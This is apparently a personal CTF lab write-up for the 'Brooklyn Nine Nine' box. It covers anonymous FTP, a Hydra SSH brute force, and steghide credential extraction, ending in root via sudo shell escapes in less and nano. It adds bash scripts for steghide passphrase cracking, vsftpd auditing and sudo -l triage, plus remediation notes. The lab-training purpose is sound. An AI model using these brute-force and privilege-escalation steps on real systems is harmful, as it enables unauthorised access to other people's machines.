Overview

Brooklyn Nine Nine is a beginner-friendly CTF with two complete attack chains leading to root. Both paths start from the same open ports but diverge based on which service you enumerate first. I completed both.

Target: 10.64.148.145
OS: Ubuntu
Tools: Nmap, FTP, Hydra, Steghide, SSH, Netcat

Reconnaissance

nmap -sV -p- 10.64.148.145

Three ports open:

  • Port 21: FTP (vsftpd 3.0.3)
  • Port 22: SSH (OpenSSH 7.6p1)
  • Port 80: HTTP (Apache 2.4.29)

Path 1: FTP Anonymous Login to Jake

FTP was the first thing to check. vsftpd accepts anonymous logins whenever anonymous_enable=YES is set in vsftpd.conf, and YES is also the compiled-in default when the directive is missing, so it is worth trying on every FTP port.

ftp 10.64.148.145

Username: anonymous, password: blank (anonymous logins accept any password string). It worked. A note from Amy to Jake was sitting in the FTP directory warning him that his password was too weak.

That gave a confirmed username and a hint that the password would fall to a wordlist. Hydra brute-forced SSH:

hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.64.148.145 ssh

Jake's password was in rockyou.txt, and the SSH login worked. Hydra itself warns that SSH servers limit the number of parallel connections and recommends adding -t 4 against SSH; a lower task count is slower but avoids dropped connections mid-run.

Checking sudo permissions:

sudo -l

Jake could run /usr/bin/less as root with no password. Less is a file pager, but it supports shell escapes: the ! command runs a shell command from inside the pager. Opening any file with sudo less and then typing !sh at the less prompt spawns a root shell, because less is already running as root and the child inherits that.

sudo less /etc/passwd
!sh

Root shell obtained.

Path 2: Steganography to Holt

The HTTP port had a Brooklyn Nine Nine themed page with a single image: brooklyn99.jpg. Downloading it and running steghide revealed hidden data inside.

wget http://10.64.148.145/brooklyn99.jpg
steghide extract -sf brooklyn99.jpg

The passphrase was admin. The extracted file contained Holt's SSH password.

ssh holt@10.64.148.145

Checking sudo permissions for holt:

sudo -l

Holt could run /bin/nano as root with no password. Nano also supports shell escapes: with nano running under sudo, Ctrl+R (Read File) followed by Ctrl+X (Execute Command) opens a prompt that runs a shell command as root.

sudo nano

Then, at the execute prompt: reset; sh 1>&0 2>&0. Nano normally captures the command's standard output into the edit buffer, so 1>&0 2>&0 points the shell's stdout and stderr back at the terminal nano is reading from, and reset cleans up the terminal state first.

Root shell obtained through a different program, same concept.

What Steganography Is

Steganography is hiding data inside another file. In this case, credentials were hidden inside a JPEG image. The image looks completely normal to anyone viewing it, and steghide also encrypts the payload with the passphrase (AES-128 in CBC mode by default), so nothing comes out without one. The catch is that the passphrase is the only protection: a weak one like admin falls to the same wordlist approach used against Jake's SSH login, and steghide info brooklyn99.jpg will report the embedded file's name and size once the right passphrase is supplied.

It is used in CTFs to simulate real-world scenarios where attackers hide data inside innocent-looking files to avoid detection. In a real investigation, finding hidden data inside images on a web server would be a significant finding.
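The passphrase here was guessable, but it usually is not. The loop below is an added example, not part of the original write-up or of steghide, and shows what a wordlist attack on a steghide file looks like using only steghide's documented extract options. STEGHIDE_BIN, the five-word inline wordlist and the output filename are assumptions made here so the loop can be read and exercised without a target.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: try a wordlist of
# passphrases against a steghide stego file. STEGHIDE_BIN is an assumption
# introduced here so the loop can be exercised against a stand-in binary.
set -u
STEGHIDE_BIN="${STEGHIDE_BIN:-steghide}"

# Try one passphrase. steghide exits non-zero when the passphrase is wrong.
# -sf is the stego file, -p the passphrase, -xf the output file,
# -f overwrites an existing output file, -q suppresses chatter.
try_passphrase() {   # $1=stegofile  $2=passphrase  $3=outfile
    "$STEGHIDE_BIN" extract -sf "$1" -p "$2" -xf "$3" -f -q >/dev/null 2>&1
}

# Walk a wordlist line by line; print the first passphrase that extracts
# data and return 0, or return 1 when the list is exhausted.
crack_steghide() {   # $1=stegofile  $2=wordlist  $3=outfile
    local pw
    while IFS= read -r pw || [ -n "$pw" ]; do   # also handles a missing final newline
        if try_passphrase "$1" "$pw" "$3"; then
            printf '%s\n' "$pw"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed five-word list for demonstration; point at rockyou.txt on a real box.
WORDLIST="$(mktemp)"
printf '%s\n' password 123456 brooklyn99 admin letmein > "$WORDLIST"

# usage: ./steg_crack.sh brooklyn99.jpg [wordlist]
if [ $# -ge 1 ]; then
    if pw="$(crack_steghide "$1" "${2:-$WORDLIST}" extracted.bin)"; then
        echo "passphrase: $pw (payload written to extracted.bin)"
    else
        echo "no passphrase in the list worked" >&2
    fi
fi
```

Every attempt re-executes steghide, so rockyou.txt at this pace takes hours. stegseek attacks steghide's file format directly and gets through the same list in seconds, which is the tool to reach for once admin and a few obvious guesses have failed.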

Vulnerability Summary

FTP Anonymous Login

vsftpd was configured to allow anonymous access, which exposed a note containing a valid username and confirmation of a weak password.

Remediation: Set anonymous_enable=NO explicitly in vsftpd.conf unless anonymous access is genuinely required; leaving the directive out is not the same thing, because vsftpd's compiled-in default is YES. Never store sensitive information in FTP directories.
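To make that remediation checkable, here is an added example (not from the write-up or from vsftpd) that audits a vsftpd.conf for the settings behind Path 1 and includes a curl one-liner for the attacker-side anonymous login check. WEAK_CONF and HARDENED_CONF are constructed here to mirror the box's situation; they are not its real configuration.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): audit a vsftpd.conf for
# anonymous access and cleartext transport, and probe a host for anonymous
# FTP with curl. The two configs at the bottom are constructed samples.
set -u

# Print a directive's value, or the compiled-in default passed as $3 when the
# directive is absent or commented out. Last occurrence wins if repeated.
vsftpd_get() {   # $1=config text  $2=directive  $3=default
    local val
    val="$(printf '%s\n' "$1" | sed -n "s/^[[:space:]]*$2=\(.*\)$/\1/p" | tail -n 1)"
    if [ -n "$val" ]; then printf '%s\n' "$val"; else printf '%s\n' "$3"; fi
}

# Print one finding per line; the return code is the number of findings.
audit_vsftpd() {   # $1=config text
    local n=0 d
    # vsftpd's built-in default for anonymous_enable is YES, so a config
    # that never mentions it still serves anonymous logins.
    if [ "$(vsftpd_get "$1" anonymous_enable YES)" = YES ]; then
        echo "anonymous_enable is YES (set, or unset and defaulting to YES)"
        n=$((n+1))
        for d in anon_upload_enable anon_mkdir_write_enable anon_other_write_enable; do
            if [ "$(vsftpd_get "$1" "$d" NO)" = YES ]; then
                echo "$d=YES: anonymous users can write to the share"
                n=$((n+1))
            fi
        done
    fi
    if [ "$(vsftpd_get "$1" ssl_enable NO)" = NO ]; then
        echo "ssl_enable=NO: passwords and files cross the wire in cleartext"
        n=$((n+1))
    fi
    return "$n"
}

# Attacker-side check (network, not run below). Anonymous FTP accepts any
# password, conventionally an e-mail address; curl exits 67 when login is denied.
ftp_anon_check() {   # $1=host
    curl -s -m 10 --list-only --user 'anonymous:anonymous@example.com' "ftp://$1/"
}

# Constructed sample: roughly what the box must have been running.
WEAK_CONF='listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_root=/srv/ftp'

# Constructed sample: anonymous access off, local users jailed, TLS on.
HARDENED_CONF='listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
ssl_enable=YES
rsa_cert_file=/etc/ssl/certs/vsftpd.pem
rsa_private_key_file=/etc/ssl/private/vsftpd.key'

# On a real host: audit_vsftpd "$(cat /etc/vsftpd.conf)"
for name in WEAK_CONF HARDENED_CONF; do
    echo "== $name"
    audit_vsftpd "${!name}" && echo "-- clean" || echo "-- $? finding(s)"
done
```

The audit treats a missing anonymous_enable as a finding on purpose; Debian and Ubuntu ship a config that sets it to NO, but a hand-written or minimal config inherits vsftpd's own default.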

Weak SSH Password

Jake's password was in rockyou.txt and fell to Hydra in a short time.

Remediation: Enforce strong password policies. Implement SSH key-based authentication and disable password login entirely (PasswordAuthentication no in sshd_config), which takes Hydra out of the picture regardless of password quality.

Sudo Shell Escape via Less

Jake had unrestricted sudo access to /usr/bin/less. Less supports the ! command to execute shell commands, which produces a root shell when the binary is running with elevated privileges.

Remediation: Audit sudo permissions carefully. GTFOBins documents shell escapes for common binaries. Never grant sudo access to interactive programs like less, nano, vim, or more unless it is absolutely necessary. Where a user genuinely needs to edit a root-owned file, grant sudoedit for that file instead of an editor binary. sudo's NOEXEC tag blocks the exec() these escapes rely on and is worth setting on anything interactive, but it is a fallback, not a substitute for not granting the binary.

Sudo Shell Escape via Nano

Holt had unrestricted sudo access to /bin/nano. Nano's Ctrl+R > Ctrl+X execute command feature produces the same result.

Remediation: Same as above. Any text editor or pager with sudo access is a privilege escalation primitive.
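Both sudo findings above come down to the same triage step: read sudo -l and spot binaries with known escapes. The script below is an added example, not from the write-up or from GTFOBins, that does this mechanically and also reports whether a rule carries the NOEXEC tag. ESCAPE_BINS is a hand-picked subset of GTFOBins sudo entries rather than the full catalogue, and the hostname and second rule in SAMPLE_SUDO_L are made up to mirror Jake's and Holt's situation.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): triage `sudo -l` output
# for binaries with documented shell escapes before trying each by hand.
# ESCAPE_BINS is a hand-picked subset of GTFOBins "sudo" entries; the
# hostname and rules in SAMPLE_SUDO_L are constructed, not from the box.
set -u

ESCAPE_BINS="less more man nano vim vi pico ed awk find python python3 perl ftp"

# Read `sudo -l` text on stdin; print "<binary> <NOEXEC|exec-allowed> <spec>"
# for every command whose basename is in ESCAPE_BINS.
flag_sudo_escapes() {
    local in_cmds=0 line rest seg bin noexec mode
    local tag_re='^([A-Z]+):[[:space:]]*(.*)$'
    while read -r line; do                      # read without IFS= trims indentation
        case "$line" in
            *"may run the following commands"*) in_cmds=1; continue ;;
        esac
        [ "$in_cmds" -eq 1 ] && [ -n "$line" ] || continue
        # Drop the "(runas_user[:runas_group])" prefix.
        case "$line" in "("*) line="${line#*\) }" ;; esac
        noexec=0
        rest="$line,"                              # trailing comma terminates the loop
        while [ -n "$rest" ]; do
            seg="${rest%%,*}"; rest="${rest#*,}"
            seg="${seg# }"
            [ -n "$seg" ] || continue
            # Tags (NOPASSWD:, NOEXEC:, SETENV:, ...) apply to every command
            # after them on the line until another tag changes them.
            while [[ "$seg" =~ $tag_re ]]; do
                case "${BASH_REMATCH[1]}" in
                    NOEXEC) noexec=1 ;;
                    EXEC)   noexec=0 ;;
                esac
                seg="${BASH_REMATCH[2]}"
            done
            seg="${seg#!}"                         # a leading ! negates the rule; still report it
            bin="${seg%% *}"; bin="${bin##*/}"     # basename of the first word
            case " $ESCAPE_BINS " in
                *" $bin "*)
                    mode=exec-allowed; [ "$noexec" -eq 1 ] && mode=NOEXEC
                    printf '%s %s %s\n' "$bin" "$mode" "$seg" ;;
            esac
        done
    done
    return 0
}

# Constructed sample modelled on the write-up; hostname and second rule are made up.
SAMPLE_SUDO_L='Matching Defaults entries for jake on brooklyn99:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jake may run the following commands on brooklyn99:
    (ALL) NOPASSWD: /usr/bin/less
    (root) NOEXEC: /bin/nano /etc/motd, /usr/local/bin/deploy.sh'

# On a live box: sudo -l | flag_sudo_escapes
printf '%s\n' "$SAMPLE_SUDO_L" | flag_sudo_escapes
```

On the sample this prints less as exec-allowed and nano as NOEXEC, and says nothing about deploy.sh. A NOEXEC hit still deserves a look, since sudo's noexec only intercepts dynamically linked programs, but it is the line to test last rather than first.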

Sensitive Credentials Hidden in Web-Accessible Image

Holt's credentials were embedded in an image served publicly on the web server. Anyone who downloaded the image and ran steghide against it with a common passphrase could extract them.

Remediation: Never store credentials in files served from a web server, hidden or otherwise.

Key Takeaways

Always try anonymous FTP login. vsftpd with anonymous access enabled is a staple of CTFs and still turns up on real networks, and the share often holds notes, backups, or other files that were never meant to be public.

GTFOBins is the reference for sudo shell escapes. If a binary appears in sudo -l, check GTFOBins immediately for known escape techniques. Less, nano, vim, more, and many others are on the list.

Both less and nano shell escapes work the same way. The programs have built-in features to execute shell commands. When running as root via sudo, those commands run as root.

Steganography requires knowing to look for it. The HTTP port looked like a dead end, just a themed page with an image. Downloading the image and running steghide is not an obvious step, but checking all three open ports completely is standard recon practice.

This lab is part of my ongoing security portfolio. You can find all my write-ups at github.com/barrytd/security-lab-portfolio.